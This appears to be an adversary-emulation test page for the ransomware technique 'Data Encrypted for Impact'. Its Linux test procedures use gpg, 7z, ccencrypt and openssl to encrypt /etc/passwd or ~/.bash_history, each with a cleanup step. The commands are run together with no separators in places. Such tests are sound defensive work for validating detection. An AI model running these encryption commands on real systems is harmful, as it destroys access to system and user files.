Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
Uses gpg to encrypt a file
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd |
| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg |
| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd |
| encryption_alg | encryption algorithm of the file | String | AES-256 |
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}rm #{encrypted_file_path}which_gpg=`which gpg` Uses 7z to encrypt a file
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd |
| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip |
| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd |
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}$which_7z e #{encrypted_file_path}
rm #{encrypted_file_path}which_7z=`which 7z` Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| cped_file_path | path where you want your copied file to be | Path | /tmp/passwd |
| root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd |
| user_input_file_path | path to file that you want to be encrypted if you are normal user | Path | ~/.bash_history |
| impact_command | command to show impact of encryption | String | sudo su |
if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fiif [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fiwhich_ccencrypt=`which ccencrypt`
which_ccdecrypt=`which ccdecrypt`
if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi Uses openssl to encrypt a file
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| private_key_path | path to the private key | Path | /tmp/key.pem |
| public_key_path | path to the public key | Path | /tmp/pub.pem |
| encryption_bit_size | size of the bit of encryption | Integer | 2048 |
| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip |
| input_file_path | path to the file that you want to encrypt | Path | /etc/passwd |
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
rm #{encrypted_file_path}which_openssl=`which openssl`